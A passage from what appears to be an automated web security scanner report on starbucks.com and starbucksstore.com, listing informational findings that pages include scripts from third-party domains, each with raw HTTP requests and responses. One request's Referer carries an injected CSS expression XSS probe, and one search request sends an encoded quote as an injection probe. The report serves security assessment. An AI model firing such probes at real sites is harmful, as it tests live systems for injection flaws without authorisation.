Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:13:12 GMT
Connection: close
Content-Length: 56666

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.52. http://www.starbucks.com/menu/food/bakery/cranberry-bliss-bar  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/cranberry-bliss-bar

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/cranberry-bliss-bar HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:57:25 GMT
Connection: close
Content-Length: 41067

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.53. http://www.starbucks.com/menu/nutrition  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/nutrition

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/nutrition HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:13:23 GMT
Connection: close
Content-Length: 48524

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.54. http://www.starbucks.com/menu/nutrition/20-under-200  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/nutrition/20-under-200

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/nutrition/20-under-200 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucks.com/?8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucks.com
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:24:04 GMT
Content-Length: 38032

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.55. http://www.starbucks.com/menu/nutrition/35-under-350  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/nutrition/35-under-350

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/nutrition/35-under-350 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:15:03 GMT
Connection: close
Content-Length: 40567

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.56. http://www.starbucks.com/responsibility  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /responsibility HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:40:25 GMT
Connection: close
Content-Length: 56642

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>


           <script type="text/javascript" src="http://widgets.twimg.com/j/2/widget.js"> </script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.57. http://www.starbucks.com/responsibility/community  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/community HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:40:24 GMT
Connection: close
Content-Length: 40095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.58. http://www.starbucks.com/responsibility/community/community-service  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community/community-service

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/community/community-service HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:40:35 GMT
Connection: close
Content-Length: 37177

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.59. http://www.starbucks.com/responsibility/community/starbucks-foundation  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community/starbucks-foundation

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/community/starbucks-foundation HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:44:59 GMT
Connection: close
Content-Length: 39028

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.60. http://www.starbucks.com/responsibility/community/starbucks-red  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community/starbucks-red

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/community/starbucks-red HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:43:46 GMT
Connection: close
Content-Length: 41532

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.61. http://www.starbucks.com/responsibility/community/youth-action  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community/youth-action

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/community/youth-action HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:40:44 GMT
Connection: close
Content-Length: 40134

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.62. http://www.starbucks.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /search

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /search?keywords=%27 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucks.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucks.com
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:14:11 GMT
Content-Length: 33615

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.63. http://www.starbucks.com/share  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /share

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /share HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=60
Content-Type: text/html; charset=utf-8
Expires: Tue, 16 Nov 2010 18:15:03 GMT
Last-Modified: Tue, 16 Nov 2010 18:14:03 GMT
Vary: *
Server: Microsoft-IIS/7.0
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:14:03 GMT
Connection: close
Content-Length: 22873


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html dir='ltr' xmlns='http://www.w3.org/1999/xhtml' xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...

10.64. http://www.starbucks.com/share/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /share/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /share/ HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=60
Content-Type: text/html; charset=utf-8
Expires: Tue, 16 Nov 2010 18:19:43 GMT
Last-Modified: Tue, 16 Nov 2010 18:18:43 GMT
Vary: *
Server: Microsoft-IIS/7.0
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:18:42 GMT
Connection: close
Content-Length: 22873


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html dir='ltr' xmlns='http://www.w3.org/1999/xhtml' xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...

10.65. http://www.starbucks.com/site-map  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /site-map

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /site-map HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:48:27 GMT
Connection: close
Content-Length: 91508

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.66. http://www.starbucks.com/store-locator  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /store-locator

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /store-locator HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:40:07 GMT
Connection: close
Content-Length: 39643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
<![endif]-->

   
   <script type="text/javascript" src="http://ecn.dev.virtualearth.net/mapcontrol/mapcontrol.ashx?v=6.2"></script>
...[SNIP]...

10.67. http://www.starbucks.com/whats-new  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /whats-new

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /whats-new HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:18:52 GMT
Connection: close
Content-Length: 43911

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.68. http://www.starbucksstore.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /?CCAID=SBPTPAHP1SHTB&Redir= HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucks.com/coffee/via/flavored-coffee
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucksstore.com
Proxy-Connection: Keep-Alive
Cookie: CookingAd=CCREF=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee&CCADATE=20101116&CCAID=SBPTPAHP1SHTB; CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21201
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:18:41 GMT

<!--S1--><!--S0-->        
   <link href="/include/sitenew.css" type="text/css" rel="StyleSheet">
   <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
   <meta name="description" content="F
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

10.69. http://www.starbucksstore.com/GuestAssist/poweredbycooking.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /GuestAssist/poweredbycooking.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /GuestAssist/poweredbycooking.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14191
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:37:21 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
